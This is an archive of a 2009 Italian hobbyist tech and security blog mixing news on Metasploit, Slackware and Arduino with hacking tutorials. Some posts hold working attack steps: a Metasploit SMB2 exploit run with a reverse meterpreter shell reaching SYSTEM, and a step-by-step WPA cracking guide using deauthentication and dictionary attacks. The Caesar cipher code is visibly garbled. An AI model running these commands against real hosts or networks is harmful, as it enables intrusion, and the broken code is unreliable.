Brains Over

Metasploit 3.3 Released!

2009-11-22T17:39:00.002+01:00

After 12 months of development, version 3.3 of the Metasploit Framework has been released! Version 3.3 includes 120 new exploit modules, over 100 new auxiliary modules, and 180 bug fixes. The release notes are online and downloads are immediately available.

Arduino:Secret Knock Detecting Lock

2009-11-07T13:49:00.001+01:00

http://grathio.com/

TopCoder

2009-10-15T06:00:00.002+02:00

TopCoder è una società che gestisce concorsi in programmazione. Ospita competizioni in algoritmi on-line così come i concorsi settimanali nella progettazione e nello sviluppo. L'opera nella progettazione e nello sviluppo di software produce utili, che viene concesso in licenza a scopo di lucro da parte TopCoder. Concorrenti che partecipano alla creazione di queste componenti vengono pagate royalties basate su queste vendite. Il software a seguito di concorsi algoritmo di solito non è direttamente un utile, ma le aziende sponsor talvolta fornire i soldi per pagare i vincitori. Statistiche (tra cui un generale "rating" per ogni sviluppatore) sono monitorati nel tempo per i concorrenti di ogni categoria.
Perciò se volete mettere alla prova le vostre capacità di sviluppo e magari procurarvi qualche utile non vi resta che registrare e iniziare a programmare.

TopCoder

PATRIZIA D'ADDARIO E BERLUSCONI

2009-10-14T06:40:00.002+02:00

Irrlicht Engine

2009-10-09T06:00:00.000+02:00

Forse non celebre come Ogre3D o Crystal Space,tuttavia Irrlicht merita senza dubbio un posto di riguardo tra gli engine 3D open source. Esso si distingue soprattutto per una miglior immediatezza d'uso rispetto ai suoi più blasonati fratelli,inoltre risulta estremamente flessibile:infatti non solo permette di usare una vasta gamma di formati per mesh e texture(.mesh,.x,.pk3,.bpm),disponibile per varie architteture e sistemi operativi, è forse anche uno dei pochi progetti a supportare diverse API quali,oltre all'OpenGl,anche Direct3D8 e Direct3D9 nonchè sono stati sviluppati per l'engine numerosi moduli,plugins per estendere le sue potenzialità e per finire oltre a una ottima documentazione e forse l'unico per cui sono reperibili alcuni tutorial in italiano.
Attualmente l'ultima versione stable rilasciata è la 1.6 ed è possibile programmarci in molti IDE quali CODE::BLOCKS,DevC++,Visual C++ ed ovviamente gcc.

Il sito di Irrlicht
Sito con guide e altro materiale in italiano

Barrelfish OS

2009-10-06T06:36:00.000+02:00

Barrelfish is a new research operating system being built from scratch in a collaboration between ETH Zurich in Switzerland and Microsoft Research Cambridge in the UK. We are exploring how to structure an OS for future multi- and many-core systems. We are motivated by two closely related trends in hardware design: first, the rapidly growing number of cores, which leads to a scalability challenge, and second, the increasing diversity in computer hardware, requiring the OS to manage and exploit heterogeneous hardware resources.

Link

Maltego

2009-10-03T06:36:00.000+02:00

Maltego is an open source intelligence and forensics application. We posted a video sometime back introducing the tool. In this video, I will show you a simple demo of how to find interesting information about a domain name - it's IP address, netblock, the Autonomous System Number and open ports on the box. We use Google.com in this example. Once, we know the netblock, we will try to find interesting stuff in the IP vicinity of the box.

Via: Securitytube

Meatasploit SMB2

2009-10-02T06:06:00.000+02:00

Preso direttamente dal blog di metasploit:

msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run

[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours

When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.

Now that we have identified two systems with SMB2 enabled, its exploit time!

msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit

[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Insecure Magazine

2009-09-30T06:51:00.000+02:00

E' disponibile l'edizione 22 della fantistica rivista per gli appassionati di informatica.Vediamo di cosa si discute in questo numero:

Using real-time events to drive your network scans
The Nmap project: Open source with style
A look at geolocation, URL shortening and top Twitter threats
Review: Data Locker
Making clouds secure
Top 5 myths about wireless protection
Securing the foundation of IT systems
Is your data recovery provider a data security problem?
Security for multi-enterprise applications
In mashups we trust?
AND MORE!

Ecco qui il link dove è possibile ottenere la rivista

Deep Green & Augmented Reality Pool

2009-09-29T06:10:00.000+02:00

The RCVLab at Queen's University demonstrates Deep Green, a pool playing robot, and ARPool, an augmented reality system for teaching the science of pool.

DEFCON 17

2009-09-26T06:48:00.002+02:00

E' da pochi giorni conclusa a Las Vegas una delle più importanti conferenze hacker; stiamo parlando del DEFCON 17.Come al solito i temi trattati sono di vario genere, ma un punto degno di un occhio di riguardo va ad Ippon un tool in grado di fare un mitm durante il processo di aggiornameto di alcuni programmi.

Per avere un visione completa della 17° conferenza consiglio la lettura del sito ufficiale dove è possibile trovare le informazioni dettagliate su tutto il programma.DEFCON

Programma C++ cifrario di Cesare

2009-09-25T06:26:00.001+02:00

Ecco a voi una versione di un semplice cifrario di Cesare in C++.Due semplici note:l'alfabeto va dalla A maiuscola alla z minuscola;inoltre il testo in chiaro deve chiamarsi "testo.txt" e il file criptato "criptato.txt".A il programma è sotto licenza GPL :)
#include
#include
#include

using namespace std;
int main(int argc, char** argv)
{
ifstream inputFile;
ofstream outputFile;
string linea;
string input="testo.txt";
string output="cifrato.txt";
string ultimoChar="z";
string primoChar="A";
cout << "inserire chiave"<>chiave;
cout<<"digita C per criptare,D per decriptare"<>scelta;
if (scelta=='D')
{
input.swap(output);
primoChar.swap(ultimoChar);
}
inputFile.open(input.c_str());
outputFile.open(output.c_str());
if (inputFile.is_open())
{
while (! inputFile.eof() )
{
getline (inputFile,linea);
for (unsigned int pos=0; pos<=linea.size(); pos++) if (linea[pos]>=65 && linea[pos]<=122)
{
for (int i=0; i<=chiave; i++)
{
if (linea[pos]!=ultimoChar[0])
{
if (scelta=='D')
linea[pos]--;
else
linea[pos]++;
}
else
linea[pos]=primoChar[0];
}
}
outputFile << linea;
}
inputFile.close();
outputFile.close();
}
return 0;
}

Google:HTC Magic e Vodafone

2009-09-24T06:30:00.002+02:00

HTC Magic disponibile nello store della vodafone a soli 399€ oppure è possibile acquistarlo con abbonamento di 9€ mensili e con un contributo iniziale di 149€.
Ed ecco le specifiche del telefono.

Processore	Qualcomm® MSM7201a™, 528 MHz
Piattaforma	Android ™
Memoria	ROM: 512 MB RAM: 192 MB
Dimensioni	113 x 55 x 13.65 mm
Peso	118,5 grammi, batteria inclusa
Display	Schermo piatto TFT-LCD sensibile al tocco da 3.0 pollici con risoluzione HVGA 320 x 480
Connettività di rete e frequenze di banda	HSDPA/WCDMA: 900/2100 MHz Velocità di connessione fino a 2 Mbps in up-link e 7.2 Mbps in down-link. Quadribanda GSM/GPRS/EDGE: 850/900/1800/1900 MHz (La frequenza di banda e la velocità di trasferimento dati variano in base all’operatore di telefonia selezionato)
Device Control	Track ball con funzione di selezione
GPS	Antenna GPS interna
Connettività	Blueetooth 2.0 con EDR e A2DP per auricolari stereo senza filo Wi-Fi: IEEE 802.11 b/g HTC ExtUSB ™ (porta mini-USB 2.0 e jack audio integrati)
Fotocamera	Fotocamera a colori da 3.2 megapixel con autofocus
Formati audio supportati	AAC, AAC+, AMR-NB, MP3, WMA, WAV, AAC-LC, MIDI, OGG
Formati video supportati	MP4, 3GP
Batteria	Batteria ricaricabile ai polimeri di ioni di Litio Capacità: 1340 mAh Autonomia in conversazione: Fino a 500 minuti in WCDMA Fino a 450 minuti in GSM Autonomia in stand-by: Fino a 660 ore in WCDMA Fino a 420 ore in GSM ( I dati tecnici di cui sopra possono variare a seconda della rete e della tipologia di utilizzo del dispositivo)
Slot di espansione	Memory card microSD™ compatibile SD 2.0)
Adattatore AC	Frequenza/Voltaggio tensione operativa: 100 240 AC, 50/60 Hz Uscita DC: 5V e 1A
Funzioni Speciali	G-sensor, bussola

Ettercap 3° video tutorial

2009-09-22T06:18:00.000+02:00

Ettercap-NG_parte_3: is the third video of four that explane various examples of sniffing/inject with Ettercap-NG tool on BackTrack-4, in a Local Area Network.
This part explane: Ettercap-Plugin/Filter - filterf_modify - search_poisoning - file-inject
0ther tool: Firefox - Kate - Kopete - LiveMessanger - VMware

Crittografia spicciola:cifrario di Cesare

2009-09-22T06:00:00.001+02:00

Il cifrario di Cesare è uno dei più antichi e semplici esempi di crittografia:
esso consiste nella sostituzione di ogni lettera dell 'alfabeto con una corrispettiva che si trovi dopo un certo numero di caratteri.Per fare un esempio,bisogna prima scegliere di quanti caratteri spostare ogni lettera,ovvero scegliere una chiave;in questo caso scegliamo 10.
Dunque dovendo spostare ogni lettera di 13 caratteri alla A corrisponderà la K,alla B la L e così via mentre la A nel testo cifrato corrisponderà la K,alla B la L,alla Q la A,e così facendo come riportato nello specchietto qui sotto.

Originale	A	B	C	D	E	F	G	H	I	J	K	L	M	N	O	P	Q	R	S	T	U	V	W	X	Y	Z

Criptato	K	L	M	N	O	P	Q	R	S	T	U	V	W	X	Y	Z	A	B	C	D	E	F	G	H	I	J

Per decriptare viceversa bisogna sostituire alla lettera una posta un certo numero di posti prima.

Ettercap 2° video tutorial

2009-09-20T06:35:00.000+02:00

Ettercap-NG_parte_1: is the second video of four that explane various examples of sniffing with Ettercap-NG on BackTrack-4, in a Local Area Network.
This part explane: Ettercap-Plugin:remote_browser - DNS Spoofing
0ther tool: Driftnet - Firefox

Zero Day DoS Attack on Multiple Browsers across all Operating Systems

2009-09-19T07:00:00.000+02:00

A 0-Day denial of service (DoS) vulnerability has been discovered by Pietro Oliva , a student of network security at the department of IT (University of Milan in crema) , which affects multiple browsers across operating systems. Though Peter is keeping the exploit private for now, he has mentioned to us that the problem lies in the way the browsers handle javascript.

According to him the latest version of the following browsers are affected: IE, Firefox, Safari, Konqueror, Galeon and Seamonkey. The detailed version numbers are mentioned in the video. The only ones immune seem to be Opera and Chrome. Pietro shows a demo of the DoS using each of the above browsers in the 2 videos embedded below.

Ettercap 1° video tutorial

2009-09-19T06:09:00.000+02:00

Ettercap-NG_parte_1: is the first video of two that explane various exaples of sniffing with Ettercap-NG tool, on BackTrack-4, in a Local Area Network.
This part explane: OS Fingerprinting - Arp Poisoning and one example of Etterfilter.

Via backtrack

Nonciclopedia:proposta di lettura

2009-09-18T06:00:00.002+02:00

Per chi non conoscesse invece Nonciclopedia,enciclopedia parodistica di Wikipedia, è arrivato il momento che rimedi anche a questo problema.
Se amate l'umorismo qui troverete il vostro paradiso terreste con articoli,news e citazioni che denigrano indistintamente chiunque.
I primi articoli qui proposti sono i cult,indispensabili per comprendere a pieno l'enciclopedia priva di qualsivoglia contenuto.
Nerd
Truzzo
Emo
Chuck Norris
Germano Mosconi

Attenzione Nonciclopedia provoca dipendeza,assuefazione e gravi danni alla salute.

Trasferimento file ssh:Secure copy

2009-09-17T06:01:00.001+02:00

Quando si ha a che fare con server remoti, gli utenti meno esperti si trovano poiché sprovvisti di interfaccia grafica a volte in difficoltà specie nel trasferire file.
Infatti se tramite wget è possibile scaricare direttamente usando il terminale file da HTTP senza dover ricorrere ad un browser ingenuamente si potrebbe essere portati a pensare che per uploadare o scaricare file da un computer remoto convenga installare un server ftp o nfs,ma se si tratta di semplici operazioni questi servizi risultino superflui in quanto il trasferimento dati può benissimo avvenire tramite ssh tramite il protocollo SCP o SFTP.
La sintassi di scp è simile al comando cp e va eseguito sul client.In breve:

#scp FileSorgente user@host:/FileDestinazione

copierà il FileSorgente presente nel client sul server ssh dove user sarà l'user name con cui connettervi ad ssh(esempio root),host l'indirizzo del server e FileDestinazione sarà la directory e il nome con cui copiare il file.
Mentre

#scp user@host:/FileSorgente FileDestinazione

Copierà dal server FileSorgente sul client in FileDestinazione.
Va detto però che il protocollo SCP integra solamente il trasferimento e non funzionalità perciò sono rari le GUI e quindi viene usato sopprattutto da linea di comando.

Ubuntu Package Backdoor using a Metasploit Payload

2009-09-16T06:30:00.000+02:00

This is a great demo by Redmeat_uk where he shows how to create a trojan using the xbomb game package. He creates the trojan by bundling a Metasploit reverse TCP stager payload with the game package. When the game is installed and executed, the Metasploit payload executes and connects back to the attacker, giving him a shell on the system. As most installations are done as root, this in most cases will end up becoming a root shell. :) Very creative! This is another example to show that Linux Malware can very easily be written and deployed, contrary to popular belief.

Via Securitytube

Books

2009-09-14T06:08:00.000+02:00

L'estate è finita...e si ricomincia a lavorare.Dopo la pausa estiva credo sia arrivato il momento di iniziare a studiare sul serio e di approfondire le proprie conoscenze quindi ho deciso di postare una seria di libri che vi potranno accompagnare per quest'inverno.

Hacker 6.0

Network Security Assesment

Security Warrior

Security Power Tools

Reti di calcolatori

L'arte dell'hacking

Sicurezza delle reti

Corto di animazione:Big Buck Bunny

2009-09-13T06:00:00.001+02:00

Forse alcuni di voi già saranno a conoscenza di Blender, uno forse dei migliori programmi per di grafica 3D.Ebbene il Blender Institute creò Big Buck Bunny,nome in codice Peach, corto di animazione nel "lontano" aprile 2008.
Cos'à di speciale?Beh prima di tutto io l'ho trovato divertente,inoltre è stato "girato" utilizzando una suitie di sofware prevalentemente open source,in primo luogo Blender e poi tanti altri come Gimp, creando,a mio avviso,un prodotto di una qualità di tutto rispetto che nulla ha da invidiare ad un corto Pixar.Terzo il corto è stato rilasciato interamente sotto licenza Creative Commons.E beh direte voi?Semplicemente oltre a godere dei vantaggi delle licenza CC l'intero materiale per la creazione è stato messo a disposizione in internet con la possibilità di scaricarli e modificarli(personaggi,texture ecc...).Intanto buona visione del video.

Sito del progetto
Production file(oltre 1gb di dati)
Studio backup(200gb)

Fuzzing the phone in your phone

2009-09-11T02:52:00.000+02:00

Oggi vi posto il link di una interessante presentazione,che riguarda la sicurezza della telefonia, fatta alla conferenza BlackHat.Il file è stato realizzato da Charlie Miller e Collin Mulliner entranbi esperti in sicurezza ,infatti Charlie fu il primo ad hackerare l'Iphone e G1 Phone mentre Mulliner scoprì un remote exploit per WinMobile che sfrutta il protocollo MMS.

Fuzzing the phone in your phone

Buon hacking ;)

Guida:Installare Nessus più Gui su slackware 13.0

2009-09-09T23:26:00.001+02:00

Oggi vediamo come installare nessus su distribuzione Slackware 13.0.
Bene come prima cosa scarichiamo il "server" qui (tar.gz) e l'interfaccia grafica qui.
Una volta ottenuto il server estraiamolo e poi da terminale:

#cd /percorso/mercorso/Nessus-4.0.1
#./install.sh

Una volta installato il "server" dobbiamo ottenere la chiave di registrazione per nessus e aggiornare i plugin quindi andiamo su questo link ed effettuiamo la richiaesta.Successivamente da terminale:
#cd /opt/nessus/sbin
#./nessus-adduser (in questo modo creiamo l'utente)
#/opt/nessus/bin/nessus-fetch --register (qui la vostra chiave che vi è stata spedia via email)

Adesso passiamo ad installare il client.Scaricato il file di estensione deb tramite utilizzo di "alien" convertiamo in tgz.Quindi da terminale:

#alien -t /percorso/percorso/nessusclient.deb

Una volta ottenuto il client in tgz passiamo alla sua installazione:

#installpkg nessusclien.tgz

Andesso non resta altro che avviare il server ed il client ed effettuare i nostri test ;)

GerixWiFi cracking WPA e WPE

2009-09-09T02:30:00.006+02:00

Ed ecco per voi lettori altri due video realizzati da Backtrack IT.Nel primo video viene mostrato il cracking di una rete wifi protetta da chiave WAP tramite l'utilizzo di GWC.Nel secondo video utilizzando sempre lo stesso programma viene mostrato come craccare un rete wifi con chiave di protezione WEP.

Installazione Metasploit Slackware 13.0

2009-09-08T02:00:00.000+02:00

Salve a tutti,oggi vediamo come installare Metasploit Framework su distribuzione Slackware 13.0.
Come primo passo scarichiamo ruby necessario a far funzionare metasploit quindi andiamo su http://ruby-gnome2.sourceforge.jp/ e scarichiamo nella sezione download "ruby-gnome2-all-0.19.1.tar.gz" una volta ottenuto ed estrato il file da terminale:

# cd /percorso/percorso/ruby-gnome2-all-0.19.1

#ruby extconf.rb

#make

#make install

Se l'installazione è andata a termine scarichiamo dal sito di Metasploit questo file tar.gz ed estraiamolo.Successivamente da terminale digitiamo:

#cd /percorso/percorso/framework-3.2

#./msfconsole ------------>" per eseguirlo da console"
#./msfgui ------------>"per eseguire la gui"

Per aggiornare metasploit e i suoi moduli basta che da terminale eseguite:

#cd /percorso/percorso/framework-3.2
#svn update

Seminario sicurezza informatica

2009-09-07T01:42:00.000+02:00

In questo articolo si possono approfondire alcune tematiche della sicurezza informatica grazie a un seminario tenutosi presso la facoltà di Ingegneria di Padova.

Video 1

Dopo una prima introduzione, si parla della cosiddetta identità digitale, di sicurezza logica e fisica dei dati (con accenno ai certificati digitali e alla firma digitale) e di skeptical computing.

Video 2

In questa seconda parte si parla di malware e possibili rimedi, di VoIP sicuro e di reti wireless e possibili vettori di attacco.

Tbeta: usare il multitouch sul votro pc

2009-09-05T02:09:00.000+02:00

Tbeta è una libreria open source che permette di implementare il multitouch sul nostro pc sfruttando un pad autocostruito i cui costi non superano i 50€.
Ecco il video tutorial che spiega come costruire il multitouch pad e il funzionamento della libreria.

Ecco qui il sito dove poete trovare tutti i dettagli e scaricarvi la libreria gratuitamente.

Aircrack-NG,John The Ripper e XHydra – Dizionario Password

2009-09-04T02:28:00.000+02:00

Visto che in alcuni post parliamo di cracking di password credo sia arrivato il momento di mettere a disposizione di voi lettori un dizionario di password completo utilizzabile con Aircrack-NG,John The Ripper e XHydra .Essendo il dizionario più di 1GB il file è stato compresso.

Scarica il Dizionario di Password

Buon cracking ;)

Cracking wpa con aircrack-ng...guida passo passo

2009-09-03T02:10:00.003+02:00

Bene bene,ecco finalmente la guida su come crackare una wpa usando aircrack.
Questa guida in particolare è stata testata e fatta su un eeepc 900 con un kernel debian 2.6.30-1-686 perciò alcune cose potrebbero cambiare in altre versioni o kernel(in particolare il nome delle interfacce dovute al fatto che nella 2.6.30 i driver Atheros sono già presenti).
Prima di tutto questa guida fa riferimento al tutorial di aircrack-ng quindi in caso vogliate approfondire o consultare l'originale basta andare al link qui sotto.
Tutorial: How to Crack WPA/WPA2

Comunque se le vostre interfacce sono wifi0 e ath0 dovrebbe bastare sostituire a wlan0 la prima e a mon0 ath0.
Incominciamo col loggarci da root e dare il comando:

#airmon-ng start wlan0 11

In questo caso wlan0 è l'interfaccia e 11 sarà il channel.
Dovrebbe apparici qualcosa di questo genere:

Interface   Chipset      Driver

wlan0      Intel 4965 a/b/g/n   iwl4965 - [phy0]
(monitor mode enabled on mon0)

Adesso incominciamo a catturare i pacchetti necessari per avere l'handshake digitando:

#airodump -c 11 --bssid 00:14:6C:7E:40:80 -w psk mon0

-c 11 indica il channel del network wireless
-bssid 00:14:6C:7E:40:80 indica il MAC address dell'AP,va sostituito con ovviamente con quello del nostro bersaglio
-w psk è il prefissio dei file dump creati da aircrack
mon0 è l'interfaccia in monitor mode

Dato il comando dovrebbe apparire qualcosa del genere :

CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                    

BSSID              STATION            PWR  Lost  Packets  Probes

Adesso per velocizzare(opzionale) il processo apriamo un altro terminale da root(sensa interrompere airodump) e diamo:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Allora in breve questo comando farà credere a un client di non essere più connesso alla rete e quindi questi cercherà di reautenticarsi(e a noi di sniffare i pacchetti di autentificazione):

-0 indica deautentificazione appunto
1 il numero di deautentificazioni(possono essere anche multiple)
-a 00:14:6C:7E:40:80 è il MAC address del AP
-c 00:0F:B5:FD:FB:C2 è il MAC del client (i client connessi appariranno associati al MAC del AP nella scheda dove è in corso airodump)
mon0 è l'interfaccia

Questo è quello che ci dovrebbe apparire:

11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

Aspettiamo un po di tempo e all'occorenza ripetiamo aireplay fino a che sulla scheda di airodump apparirà che abbiamo catturato l'handshake,dovrebbe apparire più o meno così:

CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                        

BSSID              STATION            PWR  Lost  Packets  Probes                                          

00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

A questo punto possiamo eseguire aircrack per crackare la wpa.

Diamo da root:

aircrack-ng -w /usr/share/john/password.lst -b 00:14:6C:7E:40:80 psk*.cap

-w /usr/share/john/password.lst è il path del dizionario,possiamo utilizzare anche di altri,in questo caso è quello di john the ripper
-b 00:14:6C:7E:40:80 è il mac del AP della rete da crackare
psk*.cap sono i pacchetti catturati da airodump

Dovrebbe apparire qualcosa del genere:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

#  BSSID              ESSID                     Encryption

1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.

E dopo un po di tempo se abbiamo avuto fortuna:

Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Indica che ha trovato la chiave(KEY FOUND!),in questo caso era 12345678.

Tutorial brute force:XHydra

2009-09-02T01:33:00.000+02:00

Ecco per noi un altro fantastico videotutorial realizzato da BackTrackIT dove ci viene mostrato come eseguire un brute force attack su telnet la distro utilizzata è come sempre la famosa Back track che è arrivata alla versione 4.

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)

2009-09-01T17:55:00.002+02:00

Su milw0rm è comparsa una nuova vulnerabilità per Windows che permette l'accesso remoto.Il bug colpisce Windows 2000 sp4 più precisamente le macchine dove gira Internet Information Server, versioni 5.0 e 6.0.Sul exploit non ci sono molte informazioni,ma gia gli hackari :P sono al lavoro per creare il modulo per metasploit.Ah!!!! dimenticavo ecco il link del exploit ;)

Robot Lego Mindstorm:Tilted Twister

2009-09-01T01:54:00.000+02:00

Vi siete mai cervellati tentando di risolvere il cubo di Rubik?Bhe!!! Questo robot costruito con il kit lego mindstorm è capace di risolverlo in meno di 6 minuti.Ecco il sito dove potete trovare la guida di assemblaggio e il source code del robottino.

db_autopwn con Nessus e Metasploit

2009-08-31T01:19:00.001+02:00

Continuiamo a occuparci di sicurezza informatica analizzando nel dettaglia la funzione db_autopwn di Metasploit-3 tramite l'importazione di un file .nbe ottenuto con Nessus4.Il video è stato realizzato dagli amici di Back-Track IT.Ci viene mostrato l'utilità nel sfruttare nessus e metasploit rispettivamente per trovare e utilizzare le vulnerabilità....non resta che gustare il video ;)

Slackware 13.0 release ufficiale

2009-08-30T02:28:00.005+02:00

Una bella notizia per tutti gli amanti della distribuzione Slackware come possiamo notare dal sit o è stata rilasciata ufficialmente la versine 13.0.Ecco le sue novita :

- Runs the 2.6.29.6 version of the Linux kernel from ftp.kernel.org.
  Also included is a kernel patched with Speakup to support speech
  synthesizers providing access to Linux for the visually impaired
  community.  The 2.6.x kernel series has matured into a stable
  kernel, and provides reliable performance for your desktop or
  your production server.

- System binaries are linked with the GNU C Library, version 2.9.
  This version of glibc also has excellent compatibility with
  existing binaries.

- X11 based on the X.Org Foundation's modular X Window System.
  There's been much activity in the X development world, and the
  improvements in terms of performance and hardware support are
  too numerous to mention them all here.

- Installs gcc-4.3.3 as the default C, C++, Objective-C, 
  Fortran-77/95, and Ada 95 compiler.

- Support for fully encrypted network connections with OpenSSL,
  OpenSSH, OpenVPN, and GnuPG.

- Apache (httpd) 2.2.13 web server with Dynamic Shared Object 
  support, SSL, and PHP 5.2.10.

- PCMCIA, CardBus, USB, IEE1394 (FireWire) and ACPI support.  This
  makes Slackware a great operating system for your laptop.

- The udev dynamic device management system for Linux 2.6.x.
  This locates and configures most hardware automatically as it
  is added (or removed) from the system, and creates the access
  nodes in /dev.  It also loads the kernel modules required by
  sound cards and other hardware at boot time.

- New development tools, including Perl 5.10.0, Python 2.6.2,
  Ruby 1.8.7-p174, Subversion 1.6.4, git-1.6.4, mercurial-1.2.1,
  graphical tools like Qt designer and KDevelop, and much more.

- Updated versions of the Slackware package management tools make it
  easy to add, remove, upgrade, and make your own Slackware packages.
  Package tracking makes it easy to upgrade from Slackware 12.2 to 
  Slackware 13.0 (see CHANGES_AND_HINTS.TXT).  The slackpkg tool can
  also help update from an older version of Slackware to a newer one,
  and keep your Slackware system up to date.  In addition, the
  slacktrack utility (in extra/) will help you build and maintain
  your own packages.

- Web browsers galore!  Includes KDE's Konqueror 4.2.4, 
  SeaMonkey 1.1.17 (this is the replacement for the Mozilla
  Suite), and the immensely popular Firefox 3.5.2, as well as
  the Thunderbird 2.0.0.23 email and news client with advanced
  junk mail filtering.

- The complete K Desktop Environment (KDE) version 4.2.4, including
  the KOffice productivity suite, networking tools, GUI development
  with KDevelop, multimedia tools (including the amazing Amarok
  music player and K3B disc burning software), the Konqueror web
  browser and file manager, dozens of games and utilities,
  international language support, and more.

- A collection of GTK+ based applications including pidgin-2.5.9,
   gimp-2.6.6, gkrellm-2.3.2, gxine-0.5.903, xchat-2.8.6, xsane-0.996,
   and pan-0.133.

- A repository of extra software packages compiled and ready to run.
  This includes the Java(TM) 2 Software Development Kit Standard
  Edition, an MPlayer browser plugin, alternate Intel video drivers
  for X, and more (see the /extra directory).

Un occhio di riguardo a questi :D

supporto ufficiale per i 64bit
il nuovissimo Xorg autoconfigurante
KDE 4.2.4

Questa è la guida da seguire per effettuare l'aggiornamento dalla 12.2 alla 13.0

Clonare SIM Card e Hacking Payphones

2009-08-30T01:44:00.000+02:00

Nella prima parte del video fatto da Citizen Engineer,Limor and Philip,ci mostrano come creare il circuito per poi clonare un Sim card.Il circuito può anche essere acquistato online qui costa solo 17$,mentre il software per clonare la Sim e fare altri hack è reperibile qui.

Nella seconda parte del video Limor ci mostra come modificare i Western Electric payphones in modo che possano essere utilizzati come semplici telefon di casa o per il VoIP.

Citizen_Engineer from citizen engineer on Vimeo.

Arduino

2009-08-29T01:47:00.001+02:00

Dopo aver trattato diversi argomenti riguardanti l'informatica ecco una prima introduzione al mondo della robotica parlando del meraviglioso prodotto open source e open hardware italiano "Arduino".
L'idea è nata da Massimo Banzi insegnante all'Interaction Design Institute di Ivrea.I sui studenti si lamentavano della difficoltà nel trovare un microcontrollore prestante ed economico per gestire piccoli progetti robotizzati.Fu nel 2005 che Banzi insime ad alcuni suoi amici ingegneri e un suo stesso studente (che scrisse il linguaggio di programmazione) fondarono arduino.A ottobre del 2008 sono più di 50.000 gli esemplari venduti.

Scheda Tecnica

Microprocessore	ATmega168
Voltaggio operativo	5V
Voltaggio in ingresso (raccomandato)	7-12V
Voltaggio in ingresso (limiti)	6-20V
Piedini digitali I/O	14 (di cui 6 utilizzati come outs PWM)
Piedini di ingresso analogici	6
corrente DC per i piedini di I/O	40 mA
corrente DC per il piedino a 3.3V	50 mA
Memoria Flash	16 KB (di cui 2 KB utilizzati dal bootloader)
SRAM	1 KB
EEPROM	512 bytes
Velocità di Clock	16 MHz

Prima di postare qualche mini tutorial sulla funzione di arduino...ecco il kit.Queste sono un po di foto del mio personale kit ;) comprato qui.

Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability

2009-08-28T03:21:00.003+02:00

E' da poche ore comparso su milw0rm un exploit che riguarda un componente aggiuntivo di joomla.
Stiamo parlando di DigiFolio il bug riguarda la versione 1.52 cioè l'ultima release.
L'exploit che sfrutta una SQL Injection è disponibile su milw0rm a questo link .
L'autore "v3n0m" nella descrizione dell'exploit mette in mostra come lo stesso sito produttore del componente aggiuntivo sia vulnerabile.A tutti coloro che utilizzano questo componente si consiglia la disattivazione in attesa di fix.

La tua è una password sicura?

2009-08-28T01:00:00.005+02:00

Leggendo questo post avrete capito quali sono i metodi usati da un "hacker" per scovare le vostre password.Mentre per le prime due vulnerabilità il fix e di facile intuizione per le restanti 3 bisogna analizzare la sicurezza di una password.Allora quando possiamo dire che una password è sicura?Prendiamo ad esempio la parola "casa" abbiamo a disposizione 26^4 cioè 456.976 questo significa che bastano pochi minuti ad un attacco brute force per scovare la password.Dividiamo cosi la sicurezza di una password in base al tempo di hacking.

Password che può essere hackerata in pochi minuti molto rischiosa
10 minuti - anche qui il livello di rischio è elevato
1 ora - non è buona abbastanza
1 giorno - incominciamo ad avere una password robusta
1 mese
1 anno - e con 10 anni si passa dal rischio concreto a quello teorico,ma se siete della NASA :D ancora non è abbastanza sicura.
100 annni - arrivato a questo punto uno potrebbe pensare di avere una pasword perfertta e invece no si sbaglia.....

